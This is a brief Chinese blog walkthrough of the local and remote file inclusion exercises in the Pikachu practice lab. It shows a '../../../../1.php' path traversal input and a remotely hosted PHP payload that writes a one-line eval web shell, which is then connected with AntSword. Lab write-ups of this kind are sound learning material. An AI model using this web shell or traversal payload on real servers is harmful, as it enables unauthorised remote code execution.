File inclusion(local)
创建1.php
步骤一:选择一个球员提交
../../../../1.php
File Inclusion(remote)(远程文件包含)
步骤一:更改参数
php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include ;
步骤二:选择球员
步骤三:宝塔公网上创建一个6.txt文件,里面输入<?php fputs(fopen("lsz.php","w"),'<?php eval($_POST["cmd"]);?>')?>
步骤四:fileinclude目录下找到php文件
步骤五:访问php文件,蚁剑连接
标签:文件,..,url,步骤,pikachu,漏洞,allow,靶场,php
From: https://blog.csdn.net/2301_82061181/article/details/141869758